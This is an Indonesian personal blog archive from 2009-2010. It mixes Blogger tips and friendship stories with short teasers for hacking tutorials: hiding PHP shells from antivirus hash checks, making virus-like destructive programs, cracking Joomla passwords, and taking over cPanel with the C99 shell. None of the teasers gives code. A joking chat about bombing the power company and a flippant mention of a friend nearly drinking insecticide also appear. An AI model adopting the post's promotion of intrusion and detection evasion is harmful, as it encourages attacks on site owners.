Pada umumnya root menggunakan antivirus untuk menscan sistem dan mencari berbagai file yang memiliki hash MD5 berbahaya. Hash MD5 layaknya sebuah sidik jari pada sebuah file. Setiap konten file yang berbeda akan selalu memiliki hash MD5 yang berbeda. Oleh karena itu bisa dibayangkan jika sample PHP SHELL milik anda sudah dimiliki seorang root, maka dia dapat dengan mudah mencari seluruh PHP SHELL yang sudah ditanam diserver dan segera menghapus -bahkan membloknya dari white list running process. Semua ini dilakukan hanya dengan bermodalkan sidik jari PHP SHELL kita.

Untuk lebih jelasnya silahkan baca [Disini]

Cara membuat program perusak (Seperti Virus)

2010-01-11T02:23:00.000-08:00

Tutorial ini cuMan Copas ja,,, (dari pada Hilang)…

Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak ( seperti virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.

Untuk lebih jelasnya silahkan baca di Blog satu lagi yang ada [Disini]

Innalillahi wa Innaillahi Rojiun

2009-11-04T03:52:00.000-08:00

Tanggal 04 November 2009, hari yang sedih bagiku. dimana hari itu Bapakku tercinta telah meninggalkan ku untuk selamanya,,,,

Semoga amal ibadah beliau di terima oleh Allah SWT,,,Aminnn...

selamat jalan bapakku tercinta,,,,

Konsep sederhana Joomla Password Cracker

2009-10-23T01:46:00.000-07:00

Hacking tentunya di ibaratkan seperti pisau yang memiliki 2 sisi tajam, di satu sisi seorang admin web dapat menjaga ketat sitenya dengan aman, namun patut diketahui pula tidak ada sistem yang memiliki keamanan 100%, selalu saja ada bolong yang masih dapat di eksploitasi, tapi setidaknya dapat meminimalisir serangan yang ada. Ya, tidak heran jika teori tesis dan anti tesis kerapkali hadir dalam dunia perhackingan ini.

Untuk lebih jelasnya silahkan baca-baca di Blog saya satu lagi [disini]

Hacking Cpanel Dengan C99

2009-10-13T01:24:00.000-07:00

Apakah Cpanel itu? Cpanel adalah merupakan pusat dari manajemen web site, CPanel atau istilah kerennya Control Panel adalah tempat dimana admin web untuk melakukan setting penuh dan control terhadap web yang akan dibuat atau istilahnya adalah CPANEL = Rumah yang masih kosong yang belum ada apa-apanya, nah disanalah nanti akan diisi perabotan-perabotan untuk melengkapi isi rumah tersebut, Cpanel sama juga seperti rumah, dan perabotannya bisa dikategorikan sebagai script web, script mail, script MySql, dll. Apakah CPANEL itu begitu penting dan berharga ? yups pertanyaan yang bagus jawabannya adalah IYA, karena bila CPANEL dalam suatu Web bisa dimasuki oleh para hacker maka dapat dipastikan bahwa web target berada dalam control sang hacker [ maaf saya bukan hacker J ] atau bila dilogikakan sama saja bila rumah kita berhasil di kuasain orang lain maka dipastikan orang lain tersebut bisa masuk kapan saja terhadap rumah kita.

Untuk lebih lanjut silahkan baca [disini]

Membuat Animasi Halaman Blog

2009-10-07T23:42:00.000-07:00

Pasti ingin dong blog kamu lebih atraktif dan biar kelihatan kreenn. Buat aja gambar animasi yang bisa bergerak di halaman blog kamu.
Kamu bisa meletakkannya di pojok kiri atas, kiri bawah, kanan atas ataupun kanan bawah

Mau tau cara buatnya..?

Silahkan baca diBlog ku satu lagi yang ada [disini]

Jaringan Komputer

2009-10-01T06:32:00.000-07:00

Jaringan komputer adalah sebuah kumpulan komputer, printer dan peralatan lainnya yang terhubung dalam satu kesatuan. Informasi dan data bergerak melalui kabel-kabel atau tanpa kabel sehingga memungkinkan pengguna jaringan komputer dapat saling bertukar dokumen dan data, mencetak pada printer yang sama dan bersama-sama menggunakan hardware/software yang terhubung dengan jaringan. Setiap komputer, printer atau periferal yang terhubung dengan jaringan disebut node. Sebuah jaringan komputer dapat memiliki dua, puluhan, ribuan atau bahkan jutaan node.

Tujuan dari jaringan komputer adalah untuk menghubungkan jaringan-jaringan yang ada dalam jaringan tersebut sehingga informasi dapat ditransfer dari satu lokasi ke lokasi yang lain. Karena suatu perusahaan memiliki keinginan/kebutuhan yang berbeda-beda maka terdapat berbagai cara jaringan terminal-terminal dapat dihubungkan. Struktur Geometric ini disebut dengan LAN Topologies.

Kalau ingin lebih jelas lagi silahkan baca di blog saya satu lagi ada [disini]

Hacking The Bios

2009-09-30T00:02:00.001-07:00

BIOS, singkatan dari Basic Input / Output Services, adalah kontrol program PC. Hal ini bertanggung jawab untuk memulai komputer Anda, mentransfer kontrol sistem untuk sistem operasi Anda, dan menangani tingkat rendah lainnya fungsi, seperti akses disk.

Fitur kecil yang nyaman bahwa kebanyakan produsen BIOS termasuk adalah sebuah startup password. Hal ini untuk mencegah akses ke sistem sampai Anda memasukkan sandi yang benar. Jika Anda dapat mendapatkan akses ke sistem setelah password sudah masuk, maka ada banyak perangkat lunak berbasis password BIOS extractors tersedia dari lokal Anda H / P / A / V situs.

Lebih jelasnya silahkan baca di blogku satu lagi ada [disini]

Cara Membuat Read More di Blogger

2009-09-28T19:50:00.000-07:00

Sudah banyak yang tanya cara buat READ MORE atau Baca Selengkapnya atau Baca Selanjutnya di Blogger . Dulu saya sempat bingung bagaimana cara membuat Read More di Blogger biar isi Blog kita gak kelihatan panjang, simpel tapi berisi, danlebih ringkas. Dan akhirnya saya menemukan cara membuat Read More di Blogger setelah berpetualang di Google, Ada dua cara untuk membuat read more di blogger / blogspot baru (tanda Blogger Baru adalah di admin memakai layout / tata letak dan page element / elemen halaman).

Untuk lebih jelasnya silahkan baca di blog saya satu lagi ada [disini]

Blogumus, label cloud animasi untuk blogger

2009-09-28T00:13:00.000-07:00

Blogumus adalah widget yang berfungsi untuk menampilkan kategori/label blog dalam bentuk animasi. Widget ini diadopsi dari WP-Cumulus, sebuah plugin yang dibuat untuk blog-blog yang berbasis WordPress tetapi dimodifikasi hingga akhirnya bisa ditampilkan di Blogger. Sebelum membuatnya pastikan widget label anda sudah terpasang di sidebar, disini saya mengganti nama label tersebut menjadi “Kategori”.

Untuk lebih jelasnya silahkan baca [disini]

Membuat Cursor Huruf Sendiri Di Blogger

2009-09-27T22:39:00.000-07:00

Biar tampilan blogger kita lebih hidup dan lebih keren, maka kita harus membuat Cursor huruf sendiri di Blogger kita. Seperti di Bloggerku ini,,,kreen kan Cursornya,,,

Caranya seperti ini ;

Login ke account blogger dan tujulah ke tab Layout, kemudian klik link "Add Page Element".
Pilih HTML/JAVASCRIPT dalam window Page Element tersebut.
Karena codenya sangat panjang. jadi di kamu lihat aja script nya [disini]
Copy semua javascript code yang suda kamu lihat dan paste javascript kedalam window.
Tekan Ctrl+F cari kata (BLOGFSYM). jiaka suda ketemu, gantai text itu dengan text kamu sendiri, tapi inget jangan panjang2 ya
Terus jangan lupa untuk simpan. selsai deh

Met mencoba,,,,

Pembajakan PLN vs Kerbau

2009-08-25T01:17:00.000-07:00

Gara2 sering mati Lampu di kota Pekanbaru tempat aku hidup, akhirny aku bsa membuat sbuah cerita, aku rasa kota Pekanbaru ini paling parah mati Lampunya, rata2 mati Lampu sLama 3 jm tu biasanya sampai 2-4 kli matinya, tpi rata2 3 kali, parahkn,,??

Sbelumnya aku perkenalkn spa saja yg ada di dLam crita ini, tentu saja org2 ni adalah tMn2 aku semua, sapa mreka tu,,,??? Yaitu :

Kiryu Rohman (aku sendiri ni,,,). Nama di facebook “Kiryu Rohman”.

Wahyu Dian. Nama panggilan nya Ayu berinisial si U, nama di facebook “Wahyu Ahaa Ahaa”, Kuliah di UNRI (Universitas Riau) Pekanbaru.

Rahmi Fitri. Nama panggilannya Ami berinisial si A, nama di facebook “Ami Syuara”. Kuliah di UNRI (Universitas Riau) Pekanbaru.

Dixz Ocu Paibo. Nama sbenarnya gk tw, aLny org ni gk jeLas, Q pun knaLny hanya di facebook, nama panggilanny Ocu, nama di facebook “Dixz Ocu Paibo”.

Tiap sore hari sambil menunggu berbka puasa, kami isi dengan catting di facebook, dmana waktu itu lagi enak2 ny nunggu bka puasa tiba2 mati lampu, kami pun kecewa dengan ulah PLN ni, karena janjinya selama bulan puasa katanya gak ada mati Lampu pada waktu berbuka puasa dan waktu sahur,, ternyata janji PLN ni mLeset. Berawal dari Update Status salah satu dari tMn Q yaitu Ami, yang berbunyi “9 enk b9t bka pws tiLamp 9ni.. PLN 9 pen9ertiaan...!!” nahh inilah cikal bakal obrolan kami berempat waktu catting di facebook, dimana obrolan kami berempat itu makin lama makin seru, sperti mendiskusikan sesuatu yag sangat penting, padahal cuman bercanda ja. Obrolan kami brempat slama catting di facebook kurang Lebih sperti ini :

Ami Syuara : “9 enk b9t bka pws tiLamp 9ni.. PLN 9 pen9ertiaan...!!”

Kiryu Rohman : “iyaa bner,,,PLN ni tega bner ma org2 pwsa,,jnji ny gk d tePati,,,”

Wahyu Ahaa Ahaa : “Kasih boM ajaH yuuk biib!!”

Dixz Ocu Paibo : “Ntr bg bntuin ngerakit bom na..hehe”

Ami Syuara : “Bg Kiryu ; tuL t..jnji tn99L jnji b9.. bwt tmbh d0sa 0r9 j haa,, tiap tiLamp mn9eLuh,, n iLfiiL ma pLn t….
Wahyu ; Yuuk Lh bib,, Dmn knt0r na t?? ajk y9 Laen biar serruu..”

Kiryu Rohman : “teroris braksii,,,,kaburrrrrrrrrr,,,,,pkok ny Lw da pa2 gk ikut2n,,,”

Ami Syuara : “0cu; cpt rakit na iaa b9.. Dh 9 tahan niy..”

Ami Syuara : “Bg kiryu ; b9 hrz ikuut.. nm b9 dh trdftar dh..”

Dixz Ocu Paibo : “Mending..ngerakit..smbal dlu..mao bka ne..hehe..daCH...hmh”

Wahyu Ahaa Ahaa : “Ami ; U gA auu wga kntoR nhaa biib?? Mari qTa tanyaKan peTa,,”

Ami Syuara : “Bg 0cu ; Haa.. Iaa..iaa.. kaLe niy mi stuju.. tmben b9 pntar,,hhe..”

Kiryu Rohman : “duuuhhh gmn y??? y dh Lh Lw gtu (trpaksa ikut dmi tMn), tpi Bg bgian bLkang ja y,,,”

Ami Syuara : “bib (Wahyu) ; hhe.. kek d0ra aj,, nnya" k.peta ^^”hmm pa pmbkaan biib t??

Ami Syuara : “Bg kiryu ; qt pendin9 j dLu b9.. kta 0cu n9rakit smbaL j dLu,, =)”

Kiryu Rohman : “Wahyu ; cpet tnykn PetA y,,,Lw dh dpet ssRan ny Qt braksi hbis Bka Pwasa nnti,,”

Kiryu Rohman : “Ok Lh Lw gtu, soaL urusan BUM serah kn ja ma Ocu,,,trus Bg bgian pa??(gk da respon)”

Wahyu Ahaa Ahaa : “Ami ; Hmmm mie doYenG,,es rumpuT Laut,,truS aer kLpa,,kLu biiib?? Oper laa cnii,,heee”

Kiryu Rohman : diskusi kok mLah ngobrol mkann??? dsar cWek2,,, duuuhhh bikin ngiler j,,,,”

Ami Syuara : “eh sma.. Mi j9 es rmpt Laut,,es kLpa.. bda na mi da pcaL.. barteran mi 9yen9 bib ma pcL mi.. Lempar Lh kcni bib..”

Wahyu Ahaa Ahaa : “Hoho,,,Pke embeR biar ga banjiR stempaT bg,,”

Kiryu Rohman : “yayaya,,,,siipp-siip, dh Bg siapkn emberny,,,”

Ami Syuara : “hhe.. Lebaaiii =)”

Kiryu Rohman : “PeaCe Mie,,,,Met bka pwasa semwa ny,,,,”

Dari sini obrolan kami berempat berhenti, karena bersamaan dengan waktu berbuka puasa. Jadi kami sibuk masing2 untuk berbuka puasa yang salama ini kami tunggu2. Kira2 jam 10 malam aku suntuk kali, bingung apa yang aku kerjakan malam tu. Akhirnya aku Update status di Facebook yang bunyinya “ngapain y enk ny mLem ni????” dari sini kami mulai obrolan kami lanjutkan, gk nyangka Lw obrolan kami ini lanjutan dari obrolan kami sore tadi. Kurang lebih obrolan kami sperti ini :

Kiryu Rohman : “ngapain y enk ny mLem ni????”

Wahyu Ahaa Ahaa : “Ngerakit bom wat persiapan ngebom PLN,,”

Dixz Ocu Paibo : “Btl t sob..”

Kiryu Rohman : “ngrakit bUUm gk pandai,,,Lw bjak bsa Lh,,,”

Wahyu Ahaa Ahaa : “Hmm bajak Liar,,Hmm kLu gtu bajak kntor PLN ajah,,biar jdi sawah,,hohoho”

Kiryu Rohman : “stuju bngt tu,,,,tpiiiii spa kerbau ny???”

Ami Syuara : “stjuu.. Lnjutkan misi qt y9 td b9!!”

Kiryu Rohman : “Upzz!!! pimpinan dateng,,,tmbh smngt ni,,,”

Wahyu Ahaa Ahaa : “Ami (biiB) ; KeBo nhaa si oCu ajah biiB,,dr tdi khaan ngeLawan muLu, jadi rus d ksih pLajaran,,hohoho.”

Dixz Ocu Paibo : “Yg kebo t tman xlian 1 ge..neri hri t dia ngaku2 krbau..wkwk..bdoh x khan..haha. Dk t jgn smbrang dunk.. kntrol dunk..peaCE..hmM..”

Wahyu Ahaa Ahaa : “Iiiihhh,,Ntah apo apo ocu koo,,”

Dixz Ocu Paibo : “Wahyu ; HmMm..sm..dk jg ntah pa2 ma?..weEK..”

Kiryu Rohman : “Wahyu ; Lw Bg siih stju2 j, tpi hrus mnta perstujuan dLu ma Ocu, mw gk dy jdi kebo ny,,,
Ocu ; astgfirLLh,,,”

Wahyu Ahaa Ahaa : “Iii si ocu khan cuma bawahan,,atsan khan si amii,,hooo”

Dixz Ocu Paibo : “E...enk j..dk t j yg jd kerbau na sob..kt2 ne mana co2k..y g'..Wkwkwhawqwq.”

Kiryu Rohman : “Wahyu ; Qt Lporkn j ma pimpinn, biar d peCat,,”

Dixz Ocu Paibo : “Ami na ksi wwnang ke Bg..blng j ke ami..jd adk (Wahyu) jd kerbau..mantap..hehe..”

Ami Syuara : “Iaa.. sb9i atsan,, mi stuju2 aj.. dmi kbaekan qt brsma knp tidaak?? pi Bg 0cu hrz ikhLz..hh0..”

Dixz Ocu Paibo : “E..tp da kasi wewenang..u yg jd kerbau..seap..”

Ami Syuara : “Eeh.. ntah biLa2 pLa mi kci we2nangma 0cu.. gda t duwh.. Mi msh bs atasi ndri..

Kiryu Rohman : “Ami ; yee,, dtunggu2 muLai dri tdi, bru mncuL,,,jdi kacau Lw gk da pimpinn ni,, tngok tu U (Wahyu) ma Ocu brebut jdi kebo,,,”

Wahyu Ahaa Ahaa : “Klu si oCu ga muu jadi keBoo,,saat ini wGa u mengundurkan diri dari missi pengeboman,,”

Dixz Ocu Paibo : “Sm..law U (Wahyu) ikhlas..Bg bkalan senang..jd..mao y..jd kerbau..haha..”

Kiryu Rohman : “Qt tunggu dLu keputusan dri Pimpinan,,,,okey, spa nnti yg dpet mndat jdi kebo,,,,duuhh!!!kmn pimpinn ny ni,,,,ilang2 timbul j,,”

Ami Syuara : “aarr99hh.. kL0 b9ni crta na,, 0cu ma U j jd krbau na 9mn?? biz na brebut nmpak mi.. 9mn b9 kir?? stjuu..??”

Kiryu Rohman : “stuju banget Pimpinan,,,Lanjut kn misi ny,,,"

Dixz Ocu Paibo : “Enk j mi ne..U (Wahyu)..na j..Bg jd jendral..atsan ami ge..tak asi dow..wkwk..”

Kiryu Rohman : “trma j Lh Sob (Ocu),, tu kn keptusan dri pimpinan,,, skLian bramaL,, ni kan bLn puasa,,,iklas sob,,”

Ami Syuara : “Kputusan dh buLat.. g Leh dgngGu guGat.. Sidang d.tu2p.. tuk..tuk..tuk.. dan saiia mmLih Bg Kiryu utk jd asisten saiia.. skian dn trmksh.. misi qt hrz dh jLn abz shur nnt,, wkwkwk..”

Kiryu Rohman : “siap Pimpinan,,,mksih bgt,,”

Dixz Ocu Paibo : “Hmhm..haha..lwak2..sharus na yg ketok palu Bg td t,bkan adk..ulangi..”

Ami Syuara : “0cu ; enk j.. Pmmpin na kn mi.. iaa mi Lh ian9 tk0k paLu.. kL0 9 mw kpLa b9 mi tk0k??hhaii..”

Wahyu Ahaa Ahaa : “Smuaa angkat tangaAaaaaaan,,,Door,,dooorr,,door,,Ru au rasa,,hohoho”

Ami Syuara : “eeh knp niy.. Crta na kn b0m pLn.. kuq jd qta2 yg dtmbak??”

Kiryu Rohman : “kok saling bunuh jdi ny???”

(misi ga2L, karena salah satu da yg gk trima dengan keputusan Pimpinannya)

Kiryu Rohman : “maksih smuany,,,akhir dapet bahan crita tuk ngisi bLog Ku bsok,,,”

Kiryu Rohman : “skali gi maksih smuany,,,”

Wahyu Ahaa Ahaa : “Ending eang bgusss,,hohoho,,,Disini gunuNg disana gunuNg,,pimpinan nhaa bingung pasukan nhaa pun biNgung,,
Eang pnting sA ksih ide wt Bg Rohman,,,
WassaLam,,”
“Bg kiryu ; haa b9 kir,, pa jdL tk bL09 na nti t..”

Kiryu Rohman : “siippzz,, ekting yg baguss,,,bsok bca ja di bLog Bg y,,,pertahan kn y,,,,

Kiryu Rohman : “tu Lh yg Bg pikirkn,,,enk ny pa y jdul ny??”

Wahyu Ahaa Ahaa : "Dongeng pLN eang dikutuk..”

Kiryu Rohman : “Mmmm,,, bLeh jg,,,gmn yg Laen stuju gk???

Ami Syuara : “Pembajakan knt0r pLn vs kerbau.. hhihi..”

Kiryu Rohman : “gmna Lw "Pembajakan PLN vs Kerbau" hehe,,,,mana si Ocu ni???pa mrajuk dy???”

Ami Syuara : “Stujjuu,,, iaa t.. si 0cu mrajuk.. kek na dy sdg mngikhLskan diri tk jd keb0 biz shur bsk bg,,hhe,,,, bwt 0cu ; peace ^^

Kiryu Rohman : “wkwkwkwkw,,,,,,,PEACE,,,,,”

Kira2 sperti itu obrolan kami selama Catting di facebook, tapi sayang kali tMn kami satu lagi yg bernama Neri tidak hadir dalam obrolan kami itu, coba Lw dy ada pasti obrolan itu tambah seruu,,,

Sekian duLu critany,,,, jika ada kata2 kurang enak atau berlebihan Penulis minta Ma’ap y,,,

Penulis mengucapkan trimakasih banyak kpd semua pihak yg telah mendukung crita ini trutama kepada teman-teman special penulis :
Wahyu Dian (Ayu)
Rahmi Fitri (Ami)
Dixz Ocu Paibo (Ocu)

Wassalam,,,,,

Apa yang kita alami demi teman kadang-kadang melelahkan dan menjengkelkan, tetapi itulah yang membuat persahabatan mempunyai nilai yang indah.

3 Sahabat

2009-08-22T22:58:00.000-07:00

Ni tentang sapa para Bibeh-bibeh itu sebenarnya selama Q knl ma mereka, mreka ni kuliah di UNRI (Universitas Riau) Pekanbaru, Q pun gk nyangka bsa kenal ma mreka2 ni.

Q mulai dari yg ke-1 yaitu

Si U yang mempunyai nama sbnerny adalah Wahyu, nama panjangnya “Wahyu Dian”, nama panggilan nya “Ayu”. Ayu inilah cwek Bibeh2 yang pertama kali Q kenal. Ayu ni orang ny agak tomboy dikit, bLak2kn Lw ngomong, crewet Lw dh knL, pokokny paling Mada (bhs Minangny), tpi orgny baek bngt, pandai gi,,,, Ayu ni rajin kaLi shoLatny wlwpun orng ny kyk gtu,,,iLmu tntng Agama ny juga Lumayan,,,Q ja Lw da msLah tntng Agama pasti tnya ma dy ni (Curhat), aLny Q kn tntng Agama sngt Minim kLi,,,si U ni Lah pnyebab semua ni terjadi,,, yg mnyebabkn Q knL ma Bibeh2 yg laen yaitu Ami and Nerii,,,1 gi penyebab yg ada ide ntuk mengarang sbuah crita ni,,,duhhh.. pa gi tntng si Ayu ni y, sbnr ny siih bnyk tpi gk bsa di ungkapkn dgn kata2, bingung soalny harus d muLai dari mana,,,

Yang ke-2

si A yang mmpunyai nama sebenrny adalah Ami, nama panjang nya Lw gk salah “Ami Syuara” (suara pa tu??) kira2 gtu lah, soalny Q gk pernah kenalan ma ni cwek, Q kenalnya Lewat Ayu ,,,, Q rasa Ami ni yang paling imut diantara Bibeh2 yg laen,,,Ami ni orgny pendiam, pmalu, gk byk omong, gk kyk si Ayu yg crewet, tu yg sLma ni yg Q tw,,,tpi Q sngat kagum dengan Ami ni, aLny iLmu agamany Q rasa udah di atas rata2 untuk s’Umuran ny, dari pada Q yg cuman ModaL niat ja, shoLat masih bLajr, baca Al-Quran gk pandai, pokokny Lw masalh agama masih Minim Lh Q ni,,,, Ami ni org ny sangat rajin shoLatny, Lw Q da masalah tentang agama pasti curhat ma Ami dan Ayu,,pasti Ami ni memberi penjelasan/pencerahan secara detail sampek di kasih hadist tentang hal itu, pokokny aku ni kayak di kasih ceramah privat gtu,,,wLawpun Q gak prnah ngobrol ma Ami, Q dh mrasa kenaL deket ma dy ni,,, Q ja Lw pgin ngbrol jdi segan bngt krn Ami orng ny pendiam,,,,,Uppzz!! Sry da yg saLah, trnyata Nama Ami ni sebenr ny adalah "Rahmi Fitri (Penyayang Suci)", aLny smLem Q cHatting ma dy ni, truss dy protes soal nMa tu,,, akhirny Q tnya spa nMa asLiny tu, truss di kasih dah,,,trnyta nMa ny Lbih dri yg Q byngkn, buKan "Syuara (suara BuRung X)" tpi "Fitri (Suci)",,,cntik kn nMa ny,,,hehehe... (udh jgn brLbihan gtu muJi ny, nnti dy bsar kpLa,,, truss jtuh dah,,Bruuukkk!!! gtu,,, yaa Lw jtuh ny dri HoTeL PanGeran gk trasa, Lw jTuh ny dri PoHon Cabe gmana??? trasa sKitny Kn??,,,nnti Qmu (pNuLis) yg tnggungJawaB,,,Lw aL jWab ny siih mudah, nanGgung ny ni yg braat,,,,aLny dy tu gk da gi di Kota Pekanbaru ni, Langkah maksudny??? yaaa gtuLh,,, brrti bisa doonk d truh di sudut muSium tuk nakut2in tikus,,,,wkwkwkwkwkwk,,,,PEACE,,)

yang ke-3

si N yang mempunyai nama sebnarny adalah Neri, nama panjangnya Lw gk salah “Elfi Neri”, Q knL ma Neri ni jga dari Ayu,,,slain tu kyk mana ya org ny Neri ni,,,duuuhh kyk mana ya,,,??? aLny Jarang ketemu ma dy ni ngobrol pun gak prnah, cuman tw2 ja gtu org ny,,,oiya Neri ni ngefand berat ma Agnes,,,,cuman tu ja yg Q tw tntng dy ni sLama ni,,,,

sekian dlu ya,,,aLny penulis ny mau saHurr,,,jika ada kata2 yg kurang berkenan d hati atau kta2 yg kurang enak atau kata2 yang berlebihan, penulis minta Ma’ap y trutama para Bibeh-Bibeh,,,

Sahur yuuuukkkk!!!!!!

"baran9 siapa yan9 memnin99aLkan sesuatu karena ALLah,, maka ALLah akn men99antikan yan9 Lbh baik untuk na" (sumber : FB Ami)

BIBEH - BIBEH

2009-08-15T20:09:00.000-07:00

Apa yang kita alami demi teman kadang-kadang melelahkan dan menjengkelkan, tetapi itulah yang membuat persahabatan mempunyai nilai yang indah.

Persahabatan sering menyuguhkan beberapa cobaan, tetapi persahabatan sejati bisa mengatasi cobaan itu bahkan bertumbuh bersama karenanya,,,,

Persahabatan diwarnai dengan berbagai pengalaman suka dan duka, dihibur - disakiti, diperhatikan - dikecewakan, didengar - diabaikan, dibantu - ditolak, namun semua ini tidak pernah sengaja dilakukan dengan tujuan kebencian.

Yupzz kita muLai crita ny,,,,,,

iNi tentang 3 cWek sahabat yg brInisial si A, si U, si N (deMi mnjga nama baik mreka bertiga) menyebut dirinya dengan sebutan “BIBEH” entah apa itu artinya mungkin cuman bertiga itu saja yang tau artinya. krna stiap di situs pertemanan seperti FB dan FS yang sekarang lagi marak-maraknya di bicarakan yang hampir semua orang kna virus situs ini (kyk pnykit ja pake’ sbutn virus) meraka ini saling menyapa dengn memakai nama BIBEH, tu yg Q tw,,,sLnjut ny gk tw,,hehehe,,,mereka bertiga ni KuLiah di UNRI (UNIVERSITAS RIAU) di Kota Pekanbaru, semester berapa dan jurusan apa Q pun gak tw,,, aL ny Q bkn org yg bnyk tnya, lebih jeLas lagi Q bukan wartawan,,,makanya gak tw apa-apa,,,,hehehe,,, So, Q kenal dengan para BIBEH-BIBEH ni Lom smpek s’thun, stngah tahun pun Lom nympek, kira2 dua buLan, Lebih dua minggu, lebih 24 jam 52 mnt 22 detik,,,(krang Lbih sgtu),,,,,

Dua di antara mereka bertiga mempunyai masalah yang hampir persahaBatan mereka hancur,,,yaitu antara si U dan si N. si N ini mempunyai cowok (enth brpa lma Q gk tw mreka brpcran) dengar-dengar mereka berdua ini sudah putus,,,kata brita emng benar mereka berdua ini sudah putus,,,terus si N ini cerita sama si U, bahwa sebenernya si N ini masih sayang sama tu cowok yg sekarang sudah jdi mantanny (siiiiih..romantis X pke’ sbtan Sayang),,,maka si U ni mencoba untuk membantu si N sohibnya itu untuk deketin mereka berdua lagi,,,ternyata cowok yang mantannya si N ini mempunyai rasa sama si U,,, padahaL si N sama cowok itu yang sekarang sudah menjadi mantannya itu belum lama putus (sok tw pnLis ny),,, terus si U menjelaskan semuanya, tapi cowok yang mantannya si N ini sudah gak peduli sudah gak ada rasa gi sama si N, si cowok ini malah pingin deket sama si U,,,padahaL si U sudah punya cowok (huuuuh!! nekat bner tu cwok mntn si N ni, mtuskn si N mLah ngejar cwek Laen, sohib si N pLak tu yg d kjr, emng cwok gk tw dri),, dari sinilah mulai timbul pemasalahan persahabatan antara si U dan si N mulai retak,,, terus si U ni Mencoba menjauhi cowok yang mantannya si N ini,, agar tidak ada salam paham di antara mreka berdua (si U dan si N) dan untuk menghindari persahabatan mereka berdua tidak hancur gara-gara cowok itu,,,,,,

Si U selama ni merasa di jauh sama si N dan merasa khawatir dengan persahabatannya, si U jdi sedih dan jadi kacau pikirannya, sampek si U gak bisa tidur memikirkan masalahnya itu, gimana caranya untuk jelasin sama si N sahabatnya itu yang selama ini terjadi,,,si U tidak tau harus berbuat apa lagi untuk jelaskannya,,, si U ini sudah hampir putus asa untuk menghadapi cobaan yang menimpa dirinya itu, dan hampir semangat hidupnya hilang, si U sangat bingung bercampur sedih dan jadi kacau pikirannya, apa yang harus si U lakukan agar persahabatannya tidak hancur,,,hampir saja si U berbuat nekad mw minum Baygon, mencoba merokok dengan tujuan biar tidak kacau pikirannya dan hilang stres itu,,(skLian gk gantung dri ja d pohon cabe pke’ benang jahit,,,,wkwkwkwk).

Si U sangat sedih dan murung semenjak menghadapi cobaan tu, yang biasanya si U ni selalu ceria, murah senyum dan mudah tertawa, tapi pada hari itu hampir satu senyum pun tidak ada yang keluar dari bibirnya, si U ini sangat berharap agar di ma’afkan semua kesalahannya sama si N, walaupun si N nantinya sudah tidak mau lagi menjadi sahabatnya si U lagi, dia sangat berharap sekali dengan maaf itu. si U mencoba mengirim pesan kira-kira yg isinya tentang masalah mereka berdua,, dan betapa senangny si U mendapat balasan dari si N, yang isinya kira-kira si N mengerti dan mau mema’afkan kesalahan si U (sok tw pnlisny), si U pun merasa lega, senang, bahagia, dn merasa semua beban dipikiran hilang sekita,,,,,

Maka brsatu Lh bersahabatan mreka Lgi,, dan mreka brtiga (si A, si U, si N) saLing br-BIBEH-BIBEH an lagi di situs pertemanan yg biasa meraka tempat bermain (FB),,,saLing tertawa,saling canda, saling Miss u – Miss u an, saling ngasih Comment, mulai bermunculan di situs pertemanan mreka, kayak ny situs tu sperti menjadi mLik para BIBEH-BIBEH pda hri tu,,,

Kalau ingin tau sapa mereka bertiga ini silahkan baca dicerita selanjutnya yang berjudul " 3 SAHABAT "

Sekian dLu critany y,,,Penulis ny dh ngantuk berat ni, jika da kta2 yg kurang enk, kurang pas atw brLbihan mohon MaAp y,,,d tunggu saran and kritik ny,,,

Tiduuurr aahhhh,,,,,,!!!

Ingatlah kapan terakhir kali kamu berada dalam kesulitan. Siapa yang berada di samping kamu ?? Siapa yang mengasihi kamu saat kamu merasa tidak dicintai ?? Siapa yang ingin bersama kamu saat kamu tak bisa memberikan apa-apa ??
MEREKALAH SAHABATMU
Hargai dan peliharalah selalu persahabatanmu